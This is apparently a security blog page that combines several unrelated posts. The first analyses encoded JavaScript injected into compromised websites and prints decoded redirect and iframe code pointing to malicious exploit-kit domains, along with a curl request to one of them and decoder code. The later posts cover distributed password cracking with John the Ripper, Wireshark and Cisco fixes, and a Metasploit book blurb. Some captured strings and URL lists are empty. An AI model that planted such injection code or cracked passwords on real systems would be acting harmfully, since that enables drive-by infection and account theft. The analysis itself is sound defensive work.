Encoded JavaScript (redirecting to Blackhole and other exploit kits) or used to build a remote call

Today I found several malicious iframes on a compromised website. These iframes are built from code hidden inside one of the main pages; I will share some examples I found below:

Encoded String:


We can easily decode the string above into this:

Decoded String Result:

<script language=javascript>parent.window.opener.location="http://sexualne.info/main.php";</script>

OK, let’s look inside main.php:

<script language='JavaScript'> <!--
window.location.href = "http://putanapartners.com/go.php?p=10018"
// --> </script>

Now we have found that the href assignment redirects to the URL http://putanapartners.com/go.php?p=10018. From inside my sandbox I make a request with curl:

curl --user-agent "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" http://putanapartners.com/go.php?p=10018

A requisição HTTP foi enviada, aguardando resposta… 302 Found

http://putana.cz/?p=10018 [redirecionando]

--2013-07-30 18:39:57-- http://putana.cz/?p=10018

The 302 status means that the resource was temporarily moved, and we are redirected to another URL, http://putana.cz/?p=10018.

With FakeNet enabled inside my sandbox (Windows XP, 32-bit) I found that all of the scripts redirect to landing pages that load the malicious Java content; see the result below:

All of the encoded JavaScript loads malware from:


Some information:

IP address information:

Domain sexualne.info is at: (mail.m-hoster-4.ru)

Another interesting function that I found inside another compromised website:

var temp="",i,c=0,out="";

var str="60!102!114!97!109!101!115!101!116!32!114!111!119!115!61!34!49!48!48!37!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!102!114!97!109!101!115!112!97!99!105!110!103!61!34!48!34!62!13!10!60!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!115!101!120!117!97!108!110!101!46!105!110!102!111!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!109!97!114!103!105!110!119!105!100!116!104!61!34!48!34!32!109!97!114!103!105!110!104!101!105!103!104!116!61!34!48!34!62!13!10!60!47!102!114!97!109!101!115!101!116!62!";

// The surrounding loop is missing from the captured snippet; it is restored here
// so the decoder runs. The inner loop collects digits up to the next "!", the
// lone c++ skips that "!", and String.fromCharCode turns the decimal code
// into one character appended to "out".
while(c<str.length){
    while(str.charAt(c)!='!') temp=temp+str.charAt(c++);
    c++; out=out+String.fromCharCode(temp); temp="";
}

This is not the first time I have found a function that uses this character substitution together with String.fromCharCode, which converts Unicode code points into characters.

Example:

Convert a Unicode code point into a character:

var n = String.fromCharCode(65);

The result of n will be:

A
The function above walks through the string “str”: while the current character is not “!”, it accumulates digits, and each completed number is converted into a character. The decoded output is:

Decoded function result:

<frameset rows="100%" frameborder="0" framespacing="0">

<frame src="http://sexualne.info/go.php" frameborder="0" marginwidth="0" marginheight="0">

</frameset>

<script language='JavaScript'> <!--
window.location.href = "http://dosugof.altervista.org/d107e.php" <-------------------------------------
// --> </script>
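As an added example (not code from the original post), a small Python triage helper that decodes this “!”-separated char-code scheme in general and lists the frame src and location URLs found in the result, so the payload can be inspected without running it in a browser; the sample payload and the example.invalid URLs are constructed here.

```python
"""Added example (not from the original post): decode the "!"-delimited
char-code obfuscation shown above and pull candidate landing-page URLs
out of the result, so the payload can be triaged without executing it."""
from __future__ import annotations
import re

# Constructed sample in the same encoding scheme as the post's "str"
# variable (decimal codes separated by "!"), built from plain text here so
# the example is self-contained. The URLs are placeholders.
def encode_bang(text: str) -> str:
    return "".join(f"{ord(ch)}!" for ch in text)

SAMPLE = encode_bang(
    '<frameset rows="100%"><frame src="http://example.invalid/go.php"></frameset>\r\n'
    '<script>window.location.href = "http://example.invalid/d.php"</script>'
)

def decode_bang(blob: str) -> str:
    """Mirror the post's loop: read digits up to each "!", emit chr(code).
    Tolerates a trailing "!" and whitespace; rejects anything that is not a
    decimal code so a mangled capture fails loudly instead of silently."""
    out = []
    for tok in blob.strip().split("!"):
        if not tok:
            continue
        if not tok.isdigit():
            raise ValueError(f"non-numeric token {tok!r}")
        out.append(chr(int(tok)))
    return "".join(out)

URL_PATTERNS = [
    # <frame src="..."> / <iframe src="..."> as in the decoded frameset
    re.compile(r"""<i?frame\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I),
    # window.location.href = "..." / parent.window.opener.location = "..."
    re.compile(r"""location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I),
]

def extract_urls(decoded: str) -> list[str]:
    """Unique URLs, in first-seen order, from frame src and location assignments."""
    seen: dict[str, None] = {}
    for pat in URL_PATTERNS:
        for url in pat.findall(decoded):
            seen.setdefault(url, None)
    return list(seen)

if __name__ == "__main__":
    html = decode_bang(SAMPLE)
    print(html)
    print(extract_urls(html))
```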

This is the complete list of all PHP files that load malware:


Distributed password cracking with John The Ripper and MPI

This article has been updated to reflect the changes for John version 1.7.8 as released in June 2011. The most important change is that MPI support is now integrated in the jumbo patch.

The original John the Ripper off-line password cracker only uses a single processor (core) when performing brute-force or dictionary attacks.

JtR does not use multiple cores (or machines) by itself. However, there is a patch available that adds MPI support. MPI lets you distribute the workload of a program across multiple processes, and thus across cores or even machines, but the application must support it.

The fun thing with MPI is that it is very easy to create a password cracking cluster. But for now let’s just focus on using all these unused CPU cores to help us with cracking passwords.

I am using Ubuntu and Debian Linux as my platform but Mac OS X works also perfectly.

Install MPI support

Note: Mac users have MPI support installed by default and don’t need to install this.

  • apt-get install libopenmpi-dev openmpi-bin

Download John the Ripper with extra patches

  • Get the john-1.7.8-jumbo-2.tar.gz file.

Extract John & edit the Makefile

  • tar xzf john-1.7.8-jumbo-2.tar.gz
  • cd john-1.7.8-jumbo-2/src
  • uncomment the following lines in the Makefile:

    MPIOBJ = john-mpi.o

Compile John the Ripper with MPI support

  • Run make and choose the most appropriate processor architecture. Example:

    make linux-x86-64 (for 64-bit i386)
    make linux-x86-sse2 (for 32-bit i386)
    make macosx-x86-64 (for 64 bit Mac OS X)

Test John the Ripper

  • cd ../run
  • ./john --test

Look at the benchmark values of the first test and remember them. Now let’s see if MPI does any better:

  • mpirun -np [number of (virtual) processor cores] ./john --test

Let’s assume that you have an iMac 27″ with a Core i7 with 4 real cores and hyper-threading enabled. This provides a total of 8 virtual cores.

  • mpirun -np 8 ./john --test

If you notice a significant increase in performance, you know that MPI is working properly.

Some benchmarks without and with MPI support (Traditional DES)

These are the benchmark test results when using a single core on an old Nehalem Core i7 920:

Many salts: 2579K c/s real, 2579K c/s virtual
Only one salt:  2266K c/s real, 2266K c/s virtual

These are the benchmark test results when using MPI and thus all 8 cores:

Many salts: 11015K c/s real, 11015K c/s virtual
Only one salt:  9834K c/s real, 9834K c/s virtual

And just look at the performance improvement when we overclock from 2.66 to 3.6 GHz:

Many salts: 15004K c/s real, 15004K c/s virtual
Only one salt:  13232K c/s real, 13232K c/s virtual

That is very significant. Now admire how the Core i7 920 @ 3.6 GHz is blown away by the Sandy Bridge based Core i7-2600 @ 3.4 GHz:

Many salts: 20007K c/s real, 20209K c/s virtual
Only one salt:  16881K c/s real, 16881K c/s virtual

Setting up an MPI cluster

MPI clustering is based on SSH keys. There is a single master that uses all nodes to perform the computation. The nodes are listed in a text file, nodes.txt, like this:

node01  slots=2
node02  slots=2
node03  slots=4 
node04  slots=4

In this example, node01 and node02 are dual-core systems, while node03 and node04 have quad-core processors. You must create an account on all your nodes with the same name as the one used on the master when running the master process. You also must generate a private SSH key and distribute the public part as the authorized_keys file to all nodes; this is outside the scope of this post. Please note that the SSH private key should be loaded with ssh-agent if it has a passphrase, or else do not configure a passphrase on the key. If you do not use a passphrase, understand that anyone with access to the key can access all nodes.

You may also have to put the nodexx entries in your /etc/hosts file if the names cannot be resolved by DNS.

Now I’m assuming that you are able to ssh into all nodes without being asked for a password, i.e. that SSH is properly set up.

  • mpirun -np 12 -hostfile nodes.txt ./john --test

Now you should see increased performance, beyond the limit of a single host.
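As an added example (not from the original post, John or Open MPI), a Python helper that sums the slots in a hostfile like nodes.txt to give the -np value for mpirun and checks that each node accepts a batch-mode SSH login before the run is started; the hostfile contents are the constructed ones from this post, and treating a node without slots= as one slot is an assumption of this helper.

```python
"""Added example (not from the original post): derive mpirun's -np value from
an Open MPI style hostfile and check the passwordless SSH the cluster relies on."""
from __future__ import annotations
import re
import subprocess

# Constructed hostfile, same content as the post's nodes.txt (2+2+4+4 = 12).
NODES_TXT = """\
node01  slots=2
node02  slots=2
node03  slots=4
node04  slots=4
"""

SLOT_RE = re.compile(r"\bslots=(\d+)")

def parse_hostfile(text: str) -> list[tuple[str, int]]:
    """Return (node, slots) pairs, skipping comments (#) and blank lines.
    A node without slots= is counted as 1 here (an assumption of this helper;
    MPI implementations differ in their default)."""
    nodes = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = SLOT_RE.search(line)
        nodes.append((line.split()[0], int(m.group(1)) if m else 1))
    return nodes

def total_slots(text: str) -> int:
    return sum(slots for _, slots in parse_hostfile(text))

def unreachable_nodes(text: str, timeout: int = 5) -> list[str]:
    """Nodes that refuse a batch-mode SSH login. BatchMode=yes makes ssh fail
    instead of prompting, so a missing key or an unloaded passphrase shows up
    here rather than as mpirun hanging on a password prompt."""
    bad = []
    for name, _ in parse_hostfile(text):
        cmd = ["ssh", "-o", "BatchMode=yes", "-o", f"ConnectTimeout={timeout}", name, "true"]
        if subprocess.run(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode != 0:
            bad.append(name)
    return bad

def mpirun_command(text: str, hostfile_path: str = "nodes.txt") -> list[str]:
    """The benchmark command from the post, with -np derived from the hostfile."""
    return ["mpirun", "-np", str(total_slots(text)), "-hostfile", hostfile_path, "./john", "--test"]

if __name__ == "__main__":
    print(" ".join(mpirun_command(NODES_TXT)))
```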

Some benchmarks

I ran a password cracking test on some data using a large dictionary. These are the performance differences when using all 8 cores of my Core i7 920 instead of just one:

single: 0:00:04:48      c/s: 11192K
mpi:    0:00:01:26      c/s: 46568K

The performance increase is significant.


Original Source of this article : http://louwrentius.com/blog/2011/02/parallel-/-distributed-password-cracking-with-john-the-ripper-and-mpi/

Solving the No interfaces problem with Wireshark in Ubuntu 10.10

Run the following in the Terminal:


sudo addgroup -quiet -system wireshark
sudo chown root:wireshark /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

Then run the following, replacing YOUR_USER_NAME with your user name:

sudo usermod -a -G wireshark YOUR_USER_NAME

That’s it. No need to restart or even log off. Just start Wireshark and select the network interface.

I just went to Capture -> Interfaces… and clicked the Start button for eth0:

original post: http://stream-recorder.com/forum/solving-no-interfaces-problem-wireshark-ubuntu-10-t8742.html?s=d89112d83a513ee8791e9a3aea89a738

Why Doesn’t the Cisco ASA Have Telnet or SSH Clients?

Many people ask me this question, and it always starts a new discussion, because the general view in the “security industry” is that putting Telnet/SSH clients on firewalls creates an unacceptable security risk. The reasoning is that the client can be used to effectively bypass the firewall: a user can SSH into the firewall and then SSH out from it, which represents a security breach under most corporate security policies.

I agree that a hardened system should have only the necessary software installed, but I don’t think an SSH or Telnet client is a security risk by itself. If an attacker is able to access the firewall, the game is already somewhat lost: he could just configure port forwarding and access hosts behind the firewall via Telnet/SSH that way.

Well, recent ASA versions (8.4 and above) now have TCP “ping”:

“TCP ping allows users whose ICMP echo requests are blocked to check connectivity over TCP.
With the TCP ping enhancement you can specify a source IP address and a port and source interface to send pings to a hostname or an IPv4 address.
We modified the following command: ping tcp.”

This is very good news: now we can troubleshoot connections from the firewall with the help of TCP ping. An example follows below:

FW-Diveo/pri# ping tcp inside 22
Type escape sequence to abort.
No source specified. Pinging from identity interface.
Sending 5 TCP SYN requests to port 22
from, timeout is 2 seconds:
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/4/4 ms

analysisd error message after upgrade to ossec 2.6

There’s a small bug in ossec-control: the path for ossec-logtest is
missing the bin directory. To quickly fix the issue:

# ln -s /var/ossec/bin/ossec-logtest /var/ossec/ossec-logtest


BTW, the latest snapshot has it fixed:

https://bitbucket.org/dcid/ossec-hids (just go get the source)

CISCO IME “IOException when try to get certificate: “

When we use the Cisco IME to connect to the IPS, the device returns the following message:

“IOException when try to get certificate:

To solve this problem, we need to log in to the IPS module and run the following command in EXEC mode:

sensor# tls generate-key

Metasploit: The Penetration Tester’s Guide

Book Description

“The best guide to the Metasploit Framework.” —HD Moore, Founder of the Metasploit Project

The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester’s Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.

Once you’ve built your foundation for penetration testing, you’ll learn the Framework’s conventions, interfaces, and module system as you launch simulated attacks. You’ll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.

Learn how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

You’ll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else’s to the test, Metasploit: The Penetration Tester’s Guide will take you there and beyond.

Book Details

  • Paperback: 328 pages
  • Publisher: No Starch Press (July 2011)
  • Language: English
  • ISBN-10: 159327288X
  • ISBN-13: 978-1593272883